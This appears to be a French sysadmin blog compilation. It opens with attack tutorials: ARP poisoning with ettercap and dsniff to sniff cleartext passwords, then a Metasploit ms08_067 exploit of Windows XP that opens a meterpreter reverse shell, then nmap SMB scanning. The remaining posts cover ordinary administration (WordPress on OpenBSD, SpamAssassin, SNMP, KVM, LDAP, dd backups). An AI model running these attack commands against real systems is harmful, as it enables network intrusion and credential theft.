Faire de l’ARP spoofing ou ARP poisoning

Il est très simple, sur le même segment réseau, de se faire passer pour la passerelle…

On active l’IP forwarding :

$ sudo sysctl -w net.ipv4.ip_forward=1

On lance ettercap :

$ sudo ettercap -T -M arp /@IP_PASSERELLE/ /@IP_VICTIME/

Enfin on écoute le réseau avec un outil qui nous affichera les mots de passe transitant en clair pour notamment les protocoles FTP, TELNET, SMTP et HTTP!

$ sudo dsniff -mc -n

Avec ettercap (notamment en mode graphique) on peut réaliser des MITM plus sophistiqués! Aussi, on peut uiliser tout un tas d’autres outils sympa : mailsnarf, filesnarf, urlsnarf

Dans un contexte de MITM on peut utiliser dnsspoof! il sera alors possible d’intercepter les requètes dns… et de renvoyer un résultat en fonction de notre propre un fichier host (option -f)

Attaquer un Windows XP avec Metasploit…

Lancement de metasploit :

$ sudo msfconsole

Utilisation de l’exploit « ms08_067_netapi » :

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) >

On affiche les options :

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

On indique l’IP de la machine cible dans l’attribut « RHOST » :

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
RHOST => 192.168.1.4

Chargement du payload « reverse_tcp » (pour obtenir le meterpreter) :

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

On ré-affiche les options (on y voit les nouvelles otpions liées au payload) :

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

On précise les options manquantes (ici l’IP et port de la machine locale) :

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666

Lancement de l’exploit pour avoir le meterpreter :

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on 192.168.1.33:6666 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 2 opened (192.168.1.33:6666 -> 192.168.1.4:1044) at 2013-05-03 03:27:25 -0700

meterpreter >

Et voilà.. après on peut obtenir l’invite de commande MS Windows (commande « shell »), faire une capture d’écran, faire du déport d’affichage (vnc), récupérer les hashs des mots passes présents en mémoire…

Traquer Windows XP avec nmap…

… avec l’utilisation des scripts nmap smb-os-discovery.nse et smb-system-info.nse

On lance nmap (ici depuis la distribution kali-linux) afin de scanner notre plage IP :

root@kali# cd /usr/share/nmap
root@kali:/usr/share/nmap# nmap -sV --script=scripts/smb-os-discovery.nse,scripts/smb-system-info.nse 192.168.0.0/24

Starting Nmap 6.25 ( http://nmap.org ) at 2014-11-21 10:04 CET
...

Nmap scan report for 192.168.0.53
Host is up (0.0011s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 08:00:27:36:14:2E (Cadmus Computer Systems)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: ie6winxp
|   NetBIOS computer name: IE6WINXP
|   Workgroup: MSHOME
|_  System time: 2014-11-21T01:02:50-08:00
|_smb-system-info: ERROR: Script execution failed (use -d to debug)

...

On voit clairement le ou les Windows XP.. On peut affiner en ne scannant que certains ports (option -p)

Par défaut nmap utilise le Scan TCP SYN (option -sS), ce qui permet de scanner des milliers de ports par seconde sans faire la session TCP jusqu’au bout..
http://nmap.org/man/fr/man-port-scanning-techniques.html

Pour faire des tests de vulnérabilités, on peut encore télécharger une image toute faite de windows XP ici : https://www.modern.ie/fr-fr/virtualization-tools

OpenBSD 5.4, WordPress et Nginx

Voici comment installer WordPress sur OpenBSD.

Pour installer un package, on renseigne la variable PKG_PATH :

$ sudo export PKG_PATH=ftp://ftp.openbsd.org/pub/OpenBSD/5.4/packages/amd64/

On installe php-fpm qui ajoutera les dépendances (notamment php-5.3.27) :

$ sudo pkg_add php-fpm
Ambiguous: choose dependency for php-fpm-5.3.27:
a       0: php-5.3.27
1: php-5.3.27
Your choice: 1
php-fpm-5.3.27:libiconv-1.14p0: ok
php-fpm-5.3.27:libxml-2.9.0p0: ok
php-fpm-5.3.27:gettext-0.18.2p3: ok
php-fpm-5.3.27:femail-0.98: ok
php-fpm-5.3.27:femail-chroot-0.98p2: ok
php-fpm-5.3.27:php-5.3.27: ok
php-fpm-5.3.27: ok
The following new rcscripts were installed: /etc/rc.d/php_fpm
See rc.d(8) for details.
Look in /usr/local/share/doc/pkg-readmes for extra documentation.
--- +php-5.3.27 -------------------
To enable the php-5.3 module please create a symbolic link from
/var/www/conf/modules.sample/php-5.3.conf to
/var/www/conf/modules/php.conf. As root:

ln -sf /var/www/conf/modules.sample/php-5.3.conf /var/www/conf/modules/php.conf

The recommended php configuration has been installed to:
/etc/php-5.3.ini.

Comme indiqué, on crée le lien pour activer le module :

$ sudo ln -sf /var/www/conf/modules.sample/php-5.3.conf /var/www/conf/modules/php.conf

Modification du fichier /etc/php-fpm.conf : on indique listen = /var/www/tmp/php.sock à la place de listen = 127.0.0.1:9000

Paramètres à rajouter dans /etc/nginx/nginx.conf :

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ .php$ {
root /var/www/htdocs;
fastcgi_pass unix:/tmp/php.sock;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}

Dans /etc/rc.conf.local (pour un lancement des services au démarrage) :

nginx_flags=””
pkg_scripts=”php_fpm”

Démarrage des services :

$ sudo /etc/rc.d/nginx start
$ sudo /etc/rc.d/php_fpm start

On peut tester l’installation et le fonctionnement de php en lançant une requête vers http://mon-site.fr/info.php après avoir fait ceci :

$ sudo echo '' > /var/www/htdocs/info.php
$ sudo chown www.www /var/www/htdocs/info.php

Installation d’un serveur MySQL :

$ sudo pkg_add mysql-server
mysql-server-5.1.70v0:mysql-client-5.1.70v0: ok
mysql-server-5.1.70v0:p5-Net-Daemon-0.48: ok
mysql-server-5.1.70v0:p5-PlRPC-0.2018p1: ok
mysql-server-5.1.70v0:p5-FreezeThaw-0.5001: ok
mysql-server-5.1.70v0:p5-MLDBM-2.05: ok
mysql-server-5.1.70v0:p5-Params-Util-1.07: ok
mysql-server-5.1.70v0:p5-Clone-0.34: ok
mysql-server-5.1.70v0:p5-SQL-Statement-1.33: ok
mysql-server-5.1.70v0:p5-DBI-1.622: ok
mysql-server-5.1.70v0:p5-DBD-mysql-4.023p0: ok
mysql-server-5.1.70v0: ok
The following new rcscripts were installed: /etc/rc.d/mysqld
See rc.d(8) for details.
Look in /usr/local/share/doc/pkg-readmes for extra documentation.
$

Post installation :

$ sudo /usr/local/bin/mysql_install_db
Installing MySQL system tables...
140307 16:17:55 [Warning] '--skip-locking' is deprecated and will be removed in a future release. Please use '--skip-external-locking' instead.
OK
Filling help tables...
140307 16:17:55 [Warning] '--skip-locking' is deprecated and will be removed in a future release. Please use '--skip-external-locking' instead.
OK

PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:

/usr/local/bin/mysqladmin -u root password 'new-password'
/usr/local/bin/mysqladmin -u root -h girafe.lenorcy.fr password 'new-password'

Alternatively you can run:
/usr/local/bin/mysql_secure_installation

which will also give you the option of removing the test
databases and anonymous user created by default.  This is
strongly recommended for production servers.

See the manual for more instructions.

Please report any problems with the /usr/local/bin/mysqlbug script!

On fait ce que le monsieur demande, on lance le serveur :

$ sudo /usr/local/bin/mysqld_safe &

.. et on finalise l’installation en sécurisant les accès :

$ sudo /usr/local/bin/mysql_secure_installation

NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL
SERVERS IN PRODUCTION USE!  PLEASE READ EACH STEP CAREFULLY!

In order to log into MySQL to secure it, we'll need the current
password for the root user.  If you've just installed MySQL, and
you haven't set the root password yet, the password will be blank,
so you should just press enter here.

Enter current password for root (enter for none):
OK, successfully used password, moving on...

Setting the root password ensures that nobody can log into the MySQL
root user without the proper authorisation.

Set root password? [Y/n] Y
New password:
Re-enter new password:
Password updated successfully!
Reloading privilege tables..
... Success!

By default, a MySQL installation has an anonymous user, allowing anyone
to log into MySQL without having to have a user account created for
them.  This is intended only for testing, and to make the installation
go a bit smoother.  You should remove them before moving into a
production environment.

Remove anonymous users? [Y/n]
... Success!

Normally, root should only be allowed to connect from 'localhost'.  This
ensures that someone cannot guess at the root password from the network.

Disallow root login remotely? [Y/n]
... Success!

By default, MySQL comes with a database named 'test' that anyone can
access.  This is also intended only for testing, and should be removed
before moving into a production environment.

Remove test database and access to it? [Y/n]
- Dropping test database...
... Success!
- Removing privileges on test database...
... Success!

Reloading the privilege tables will ensure that all changes made so far
will take effect immediately.

Reload privilege tables now? [Y/n]
... Success!

Cleaning up...

All done!  If you've completed all of the above steps, your MySQL
installation should now be secure.

Thanks for using MySQL!

Est-ce que MySQL tourne?

$ sudo fstat | grep "*:" | grep mysql
_mysql   mysqld     18833   11* internet stream tcp 0xfffffe8074df0050 *:3306

On modifie /etc/rc.conf.local :

pkg_scripts="php-fpm mysqld"

On crée la base et l’utilisateur pour WordPress :

$ sudo mysql -u root -h localhost -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or g.
Your MySQL connection id is 11
Server version: 5.1.70-log OpenBSD port: mysql-server-5.1.70v0

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> CREATE DATABASE wordpressdb;
Query OK, 1 row affected (0.01 sec)

mysql> GRANT ALL ON wordpressdb.* to wpuser@localhost IDENTIFIED BY '*** mon scret ***';
Query OK, 0 rows affected (0.00 sec)

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| wordpressdb        |
+--------------------+
3 rows in set (0.00 sec)

mysql> q
Bye

On installe WordPress :

$ sudo pkg_add wordpress
wordpress-3.5.2:php-mysql-5.3.27: ok
wordpress-3.5.2: ok
Look in /usr/local/share/doc/pkg-readmes for extra documentation.
--- +php-mysql-5.3.27 -------------------
You can enable this module by creating a symbolic link from
/etc/php-5.3.sample/mysql.ini to
/etc/php-5.3/mysql.ini. As root:

ln -sf /etc/php-5.3.sample/mysql.ini /etc/php-5.3/mysql.ini

$ ln -sf /etc/php-5.3.sample/mysql.ini /etc/php-5.3/mysql.ini

On copie l’arborescence du blog WordPress là où on le souhaite :

$ sudo cp -rp /var/www/wordpress /var/www/htdocs/blog
$ sudo chown -R www:www /var/www/htdocs/blog/
$ sudo chmod -R g+w /var/www/htdocs/blog/

On rend accessible en lecture le fichier de configuration de php au groupe www :

$ sudo chown root:www /etc/php-5.3.ini
$ sudo chmod 640 /etc/php-5.3.ini

Comme Nginx est en environnement Chrooté, il faut tout de même permettre l’accès à la socket mysql :

$ sudo mkdir -p /var/www/var/run/mysql/
$ sudo ln -f /var/run/mysql/mysql.sock /var/www/var/run/mysql/mysql.sock

Ce lien doit être régénéré à chaque redémarrage de MySQL… On peut par exemple créé ce lien dans /etc/rc.local.

…puis à un fichier resolv.conf que l’on recrée pour permettre la résolution de noms (avec par exemple le DNS de google) :

$ sudo mkdir -p /var/www/etc/
$ sudo echo "nameserver 8.8.8.8" > /var/www/etc/resolv.conf
$ sudo chown root:www /var/www/etc/resolv.conf
$ sudo chmod 640 /var/www/etc/resolv.conf

On peut vérifier que les résolutions DNS se font bien depuis l’application :

$ sudo tcpdump -Xni em0 port 53
tcpdump: listening on em0, link-type EN10MB
tcpdump: WARNING: compensating for unaligned libpcap packets
11:01:48.075462 X.Y.Z.W.15350 > 8.8.8.8.53: 64232+ A? api.wordpress.org. (35)
  0000: 4500 003f 757a 0000 4011 83c0 d453 9d10  E..?uz..@....S..
  0010: 0808 0808 3bf6 0035 002b 973b fae8 0100  ....;..5.+.;....
  0020: 0001 0000 0000 0000 0361 7069 0977 6f72  .........api.wor
  0030: 6470 7265 7373 036f 7267 0000 0100 01    dpress.org.....

11:01:48.086135 8.8.8.8.53 > X.Y.Z.W.15350: 64232 3/0/0 CNAME wordpress.org., A 66.155.40.250, (81)
  0000: 4500 006d d974 0000 3111 2e98 0808 0808  E..m.t..1.......
  0010: d453 9d10 0035 3bf6 0059 835d fae8 8180  .S...5;..Y.]....
  0020: 0001 0003 0000 0000 0361 7069 0977 6f72  .........api.wor
  0030: 6470 7265 7373 036f 7267 0000 0100 01c0  dpress.org......
  0040: 0c00 0500 0100 0026 7a00 02c0 10c0 1000  .......&z.......
  0050: 0100 0100 0000 4e00 0442 9b28 fac0 1000  ......N..B.(....
  0060: 0100 0100 0000 

Enfin, on peut finir l’installation de WordPress via l’interface web : http://mon-site.fr/blog/wp-admin/install.php … et il faut mettre à jour WordPress (toujour depuis l’interface web) pour avoir la toute dernière version!

[Debian Wheezy] Spamassassin prend son temps! avec un DNSBL qui ne répond plus…

Après une installation classique d’un serveur SMTP (sur une Wheezy avec les paquets actuels) avec (donc) Postfix 2.9.6-2, Amavis-new 1:2.7.1-2, Clamav 0.97.8+dfsg-1 et Spamassassin 3.3.2 (+pyzor/razo2/DCC), je me rends compte que les messages mettent plus de 4 secondes avant d’être délivrés (de façon asynchrone tout de même)..

En mode Debug on peut voir les pourcentages du temps passé pour les traitements antispam et antivirus :

Feb 13 15:29:28 mailhost postfix/smtp[4184]: 2CA41A075B:
to=<arnaud.lenorcy@mydomain.com>, relay=127.0.0.1[127.0.0.1]:10024,
delay=4.6, delays=0.31/0.01/0.01/4.3, dsn=2.0.0, status=sent (250 2.0.0 from
MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as 88F7AA0A72)
Feb 13 15:29:28 mailhost amavis[4167]: (04167-01) size: 1244, TIMING [total 4270
ms] - SMTP greeting: 11 (0%)0, SMTP EHLO: 2 (0%)0, SMTP pre-MAIL: 2 (0%)0,
mkdir tempdir: 2 (0%)0, create email.txt: 0 (0%)0, SMTP pre-DATA-flush: 5
(0%)0, SMTP DATA: 33 (1%)1, check_init: 1 (0%)1, digest_hdr: 1 (0%)1,
digest_body: 1 (0%)1, mkdir parts: 4 (0%)1, mime_decode: 12 (0%)2,
get-file-type1: 17 (0%)2, parts_decode: 0 (0%)2, check_header: 1 (0%)2,
AV-scan-1: 11 (0%)2, spam-wb-list: 2 (0%)2, SA parse: 7 (0%)3, SA check:
4010 (94%)97, decide_mail_destiny: 13 (0%)97, notif-quar: 1 (0%)97,
fwd-connect: 19 (0%)97, fwd-mail-pip: 34 (1%)98, fwd-rcpt-pip: 1 (0%)98,
fwd-data-chkpnt: 0 (0%)98, write-header: 1 (0%)98, fwd-data-contents: 0
(0%)98, fwd-end-chkpnt: 43 (1%)99, prepare-dsn: 1 (0%)99, main_log_entry: 29
(1%)100, update_snmp: 3 (0%)100, SMTP pre-response: 1 (0%)100, SMTP
response: 1 (0%)100, unlink-1-files: 0 (0%)100, rundown: 1 (0%)100

Ce qui prend du temps c’est le SA check !

En lançant amavis en mode debug :

amavisd-new debug

.. on se rend compte qu’il s’agit d’une tentative d’accès à un DNSBL qui n’aboutit pas! Il s’agit de dnsbl.njabl.org qui est OFFLINE depuis Mars 2013. Au bout d’environ 4 secondes un timeout arrêtait tout de même la recherche..

Le fichier /usr/share/spamassassin/20_dnsbl_tests.cf contient les références à ce DNSBL :

# See the Mail::SpamAssassin::Conf manual page for details of how to use
# check_rbl().

# ---------------------------------------------------------------------------
# Multizone / Multi meaning BLs first.
#
# Note that currently TXT queries cannot be used for these, since the
# DNSBLs do not return the A type (127.0.0.x) as part of the TXT reply.
# Well, at least NJABL doesn't, it seems, as of Apr 7 2003.

# ---------------------------------------------------------------------------
# NJABL
# URL: http://www.dnsbl.njabl.org/

header __RCVD_IN_NJABL          eval:check_rbl('njabl', 'combined.njabl.org.')
describe __RCVD_IN_NJABL        Received via a relay in combined.njabl.org
tflags __RCVD_IN_NJABL          net
reuse  __RCVD_IN_NJABL

header RCVD_IN_NJABL_RELAY      eval:check_rbl_sub('njabl', '127.0.0.2')
describe RCVD_IN_NJABL_RELAY    NJABL: sender is confirmed open relay
tflags RCVD_IN_NJABL_RELAY      net
reuse  RCVD_IN_NJABL_RELAY

# NJABL DUL: obsoleted by PBL (bug 5187)

header RCVD_IN_NJABL_SPAM       eval:check_rbl_sub('njabl', '127.0.0.4')
describe RCVD_IN_NJABL_SPAM     NJABL: sender is confirmed spam source
tflags RCVD_IN_NJABL_SPAM       net
reuse  RCVD_IN_NJABL_SPAM

header RCVD_IN_NJABL_MULTI      eval:check_rbl_sub('njabl', '127.0.0.5')
describe RCVD_IN_NJABL_MULTI    NJABL: sent through multi-stage open relay
tflags RCVD_IN_NJABL_MULTI      net
reuse  RCVD_IN_NJABL_MULTI

header RCVD_IN_NJABL_CGI        eval:check_rbl_sub('njabl', '127.0.0.8')
describe RCVD_IN_NJABL_CGI      NJABL: sender is an open formmail
tflags RCVD_IN_NJABL_CGI        net
reuse  RCVD_IN_NJABL_CGI

header RCVD_IN_NJABL_PROXY      eval:check_rbl_sub('njabl', '127.0.0.9')
describe RCVD_IN_NJABL_PROXY    NJABL: sender is an open proxy
tflags RCVD_IN_NJABL_PROXY      net
reuse  RCVD_IN_NJABL_PROXY

Pour éviter ce DNSBL j’ai rajouté de ces quelques lignes dans /etc/spamassassin/local.cf :

score   __RCVD_IN_NJABL 0
score   RCVD_IN_NJABL_RELAY 0
score   RCVD_IN_NJABL_SPAM 0
score   RCVD_IN_NJABL_MULTI 0
score   RCVD_IN_NJABL_CGI 0
score   RCVD_IN_NJABL_PROXY 0

voilà il n’y a plus cette latence de 4 secondes par message!

Le lien suivant décrit comment mieux paramétrer ces DNSBL :
http://wiki.apache.org/spamassassin/DnsBlocklists

Pour éviter tous les DNSBL, on pourrait mettre ça dans /etc/spamassassin/local.cf :

skip_rbl_checks  1

Avec une version >= 3.4 de Spamassassin, pour éviter simplement le DNSBL njabl.org, on pourrait mettre ceci dans /etc/spamassassin/local.cf :

dns_query_restriction deny njabl.org

A priori, pour qu’il y ait encore moins de latence, il vaudrait mieux avoir un cache dns en local sur le serveur SMTP :
http://wiki.apache.org/spamassassin/CachingNameserver

Pour ça, sur la Debian Wheezy, il suffit simplement d’installer BIND9 :

apt-get update
apt-get install bind9

.. et la configuration par défaut suffit!

[Debian Wheezy] Surveille ta mailq!

Voici comment superviser simplement la mailq de votre serveur SMTP (Postix par exemple).

Installer le serveur snmp :

apt-get install snmpd

Rajouter dans /etc/snmp/snmpd.conf (w.x.y.z est l’IP du serveur de supervision) les 2 lignes suivantes :

rocommunity public w.x.y.z
extend mailqstats /etc/snmp/mailqstats.sh

Vous pouvez changer le community « public » pour un tout autre nom…

Créer le fichier /etc/snmp/mailqstats.sh affichant le nombre de courriel de la mailq :

#!/bin/bash
mailq | tail -n 1 | awk '{if (NF > 4) {print $5} else {print 0}}'

Permettre l’exécution du fichier :

chmod +x /etc/snmp/mailqstats.sh

Dans /etc/hosts.allow, rajouter une autorisation d’accès pour votre serveur de supervision :

snmpd: w.x.y.z

Depuis votre serveur de supervision, lancer un snmpget :

snmpget -v2c -c public gretchen 1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.97.105.108.113.115.116.97.116.115.1
iso.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.97.105.108.113.115.116.97.116.115.1 = STRING: "104"

On a 104 mail dans la mailq!

Utiliser centreon pour superviser et grapher automatiquement cette mailq avec le service générique check_centreon_snmp_value!

[BSD] invité OpenBSD 5.4 sur un hôte KVM

Création du volume logique :

# lvcreate -n musclor -L50G virtvol 
Logical volume "musclor" created 

Téléchargement de l’ISO :

# cd /isos/
# wget http://mirrors.ircam.fr/pub/OpenBSD/5.4/amd64/install54.iso

Installation avec virt-install :

#  virt-install --name=musclor --ram=4096 --vcpus=2 --disk path=/dev/virtvol/musclor,bus=virtio --vnc --cdrom=/isos/install54.iso --os-type=unix --os-variant=openbsd4 --network=bridge:br0,model=virtio --hvm --keymap=fr

Attention : pour bénéficier de virtio, il est indispensable de l’indiquer explicitement!

Pour connaître la liste des os-variant :

virt-install --os-variant list 

Affichage du noyau :

# uname -a 
OpenBSD musclor 5.4 GENERIC#37 amd64 

Ce con, pourquoi ne m’a t’il pas chargé le noyau MP ? (en même temps j’avais dû cocher moi-même « BSD.MP » à l’installation alors qu’il aurait dû savoir de lui même qu’il y avait plus d’un processeur vus les paramètre du virt-install)..

On le fait charger le noyau MP :

# cd /
# cp /bsd /bsd.sp
# cp bsd.mp /bsd
# sync
# reboot

Après reboot, c’est mieux :

# uname -a                                                                                                           
OpenBSD musclor 5.4 GENERIC.MP#41 amd64 

Voici les information issues de « dmesg » :

# dmesg | grep cpu 
acpicpu0 at acpi0
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: QEMU Virtual CPU version 1.1.2, 2400.39 MHz
cpu0: FPU,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,CX16,POPCNT,NXE,LONG,LAHF
cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 512KB 64b/line 16-way L2 cache
cpu0: ITLB 255 4KB entries direct-mapped, 255 4MB entries direct-mapped
cpu0: DTLB 255 4KB entries direct-mapped, 255 4MB entries direct-mapped
cpu0: smt 0, core 0, package 0
cpu0: apic clock running at 1000MHz
cpu at mainbus0: not configured
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: QEMU Virtual CPU version 1.1.2, 2400.36 MHz
cpu0: FPU,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,CX16,POPCNT,NXE,LONG,LAHF
cpu0: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 512KB 64b/line 16-way L2 cache
cpu0: ITLB 255 4KB entries direct-mapped, 255 4MB entries direct-mapped
cpu0: DTLB 255 4KB entries direct-mapped, 255 4MB entries direct-mapped
cpu0: smt 0, core 0, package 0
cpu0: apic clock running at 1000MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: QEMU Virtual CPU version 1.1.2, 2400.14 MHz
cpu1: FPU,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,SSE3,CX16,POPCNT,NXE,LONG,LAHF
cpu1: 64KB 64b/line 2-way I-cache, 64KB 64b/line 2-way D-cache, 512KB 64b/line 16-way L2 cache
cpu1: ITLB 255 4KB entries direct-mapped, 255 4MB entries direct-mapped
cpu1: DTLB 255 4KB entries direct-mapped, 255 4MB entries direct-mapped
cpu1: smt 0, core 0, package 1

[BSD] KVM, virtio et FreeBSD 9.1

Sur une installation de FreeBSD 9.1 (plutôt lente!) sur une VM KVM… voici comment utiliser virtio :

# pkg_add http://people.freebsd.org/~kuriyama/virtio/9.1/virtio-kmod-9.1-0.250249.tbz
Fetching http://people.freebsd.org/~kuriyama/virtio/9.1/virtio-kmod-9.1-0.250249.tbz... Done.

vérifier les mises à jour : http://people.freebsd.org/~kuriyama/virtio/9.1/

A l’issue de l’installation, les indications sont clairement affichés.. à savoir (en français) :

création du fichier /boot/loader.conf avec dedans :

virtio_load="YES"
virtio_pci_load="YES"
virtio_blk_load="YES"
if_vtnet_load="YES"
virtio_balloon_load="YES"

modification de /etc/fstab /etc/rc.conf :

# sed -i.bak -Ee 's|/dev/ada?|/dev/vtbd|' /etc/fstab
# echo 'ifconfig_vtnet0_name="re0"' >> /etc/rc.conf

On stoppe la FreeBSD

# halt -p

… et voici les changements à faire dans le fichier xml de la vm (virsh edit ma_vm) :

-      <target dev='hda' bus='ide'/>
-      <address type='drive' controller='0' bus='0' unit='0'/>
+      <target dev='vda' bus='virtio'/>
+      <address type='pci' domain='0x0000' bus='0x00' slot='0x05' function='0x0'/>
...
-      <model type='e1000'/>
+      <model type='virtio'/>

puis sur l’hôte :

# virsh start ma_vm

Openldap sur debian squeeze : autoremove des logs bdb

Sachant que les bases sont situées dans /var/lib/ldap, rajoutez dans /var/lib/ldap/DB_CONFIG de :

set_flags DB_LOG_AUTOREMOVE

D’ailleurs voici un exemple de contenu pour ce fichier :

/var/lib/ldap# cat DB_CONFIG 
set_cachesize 0 2097152 0
set_lk_max_objects 1500
set_lk_max_locks 1500
set_lk_max_lockers 1500
set_flags DB_LOG_AUTOREMOVE

Installation d’outils de gestion des bases bdb :

# aptitude install db4.8-util
Les NOUVEAUX paquets suivants vont être installés : 
  db4.8-util 
0 paquets mis à jour, 1 nouvellement installés, 0 à enlever et 0 non mis à jour.
Il est nécessaire de télécharger 134 ko d'archives. Après dépaquetage, 446 ko seront utilisés.
Prendre : 1 http://ftp.lip6.fr/pub/linux/distributions/debian/ squeeze/main db4.8-util amd64 4.8.30-2 [134 kB]
 134 ko téléchargés en 0s (2 034 ko/s)
Sélection du paquet db4.8-util précédemment désélectionné.
(Lecture de la base de données... 23452 fichiers et répertoires déjà installés.)
Dépaquetage de db4.8-util (à partir de .../db4.8-util_4.8.30-2_amd64.deb) ...
Traitement des actions différées (« triggers ») pour « man-db »...
Paramétrage de db4.8-util (4.8.30-2) ...

Pour voir les logs inutiles :

# cd /var/lib/ldap
/var/lib/ldap# db4.8_archive
log.0000000001
log.0000000002
log.0000000003
log.0000000004
log.0000000005
log.0000000006
log.0000000007

Pour supprimer les archives inutiles :

# db4.8_archive -d

Il est donc possible de planifier cette tâche! Si on ne souhaite pas positionner le flag DB_LOG_AUTOREMOVE

Commandes issues du paquet db4.8-util :

db4.8_archive
db4.8_deadlock
db4.8_hotbackup
db4.8_printlog
db4.8_sql
db4.8_upgrade     
db4.8_checkpoint
db4.8_dump
db4.8_load
db4.8_recover
db4.8_stat
db4.8_verify

DD, LVM et KVM… en vrac

Quelques trucs en vrac…

simple sauvegarde de VM (volume logique) avec dd

liste des volumes logiques :

# lvs
  LV         VG      Attr   LSize Origin Snap%  Move Log Copy%  Convert
  maja       virtvol -wi-a- 8,00g                                      
  maja-swap  virtvol -wi-a- 2,00g                                      
  raton      virtvol -wi-ao 8,00g                                      
  raton-swap virtvol -wi-ao 1,00g   

copie :

# dd if=/dev/virtvol/maja of=maja.bak bs=512K

restauration :

# dd if=maja.bak of=/dev/virtvol/maja bs=512K

copie avec compression :

# dd if=/dev/virtvol/maja bs=512K | gzip -c9 > maja.gzip

restauration :

# gzip -dc maja.gzip | dd of=/dev/virtvol/maja bs=512K

pour avoir une jauge, on peut utiliser pv :

# aptitude install pv

copie avec compression (+jauge) :

# dd if=/dev/virtvol/maja bs=512K | pv -s 8G | gzip -c9 > maja2.gzip
16384+0 enregistrements lus==================================> ] 99% ETA 0:00:01
16384+0 enregistrements écrits
   8GO 0:05:20 [25,5MB/s] [==================================>] 100%            8589934592 octets (8,6 GB) copiés
, 320,776 s, 26,8 MB/s

quelques commandes

Cette commande valide la dispostion de la machine hôte a bénéficier de la virtualisation avec kvm :

# kvm-ok 
INFO: /dev/kvm exists
KVM acceleration can be used

La commande kvm_stat nous fournit un ensemble de stats :

kvm statistics

 kvm_exit                                      7409     398
 kvm_entry                                     7409     398
 kvm_mmio                                      4890     256
 kvm_emulate_insn                              3305     174
 kvm_userspace_exit                            2809     147
 kvm_apic                                      2499     138
 vcpu_match_mmio                               2217     114
 kvm_inj_virq                                  2015     111
 kvm_apic_accept_irq                           2015     111
 kvm_pio                                        606      33
 kvm_fpu                                         44       0
 kvm_cr                                          14       0
 kvm_age_page                                    47       0
 kvm_page_fault                                  10       0
 kvm_set_irq                                      4       0
 kvm_pic_set_irq                                  4       0
 kvm_ioapic_set_irq                               4       0
 kvm_ack_irq                                      2       0
 kvm_exit(HLT)                                    1       0
 kvm_exit(APIC_ACCESS)                            1       0
 kvm_exit(EPT_MISCONFIG)                          1       0

utilisation de virt-clone

# lvs
  LV         VG      Attr   LSize Origin Snap%  Move Log Copy%  Convert
  maja       virtvol -wi-a- 8,00g                                      
  maja-swap  virtvol -wi-a- 2,00g                                      
# lvcreate -L 8G -n maja2 virtvol
# lvcreate -L 2G -n maja2-swap virtvol

# virt-clone --original maja --name maja2 --file /dev/virtvol/maja2 --file /dev/virtvol/maja2-swap --prompt
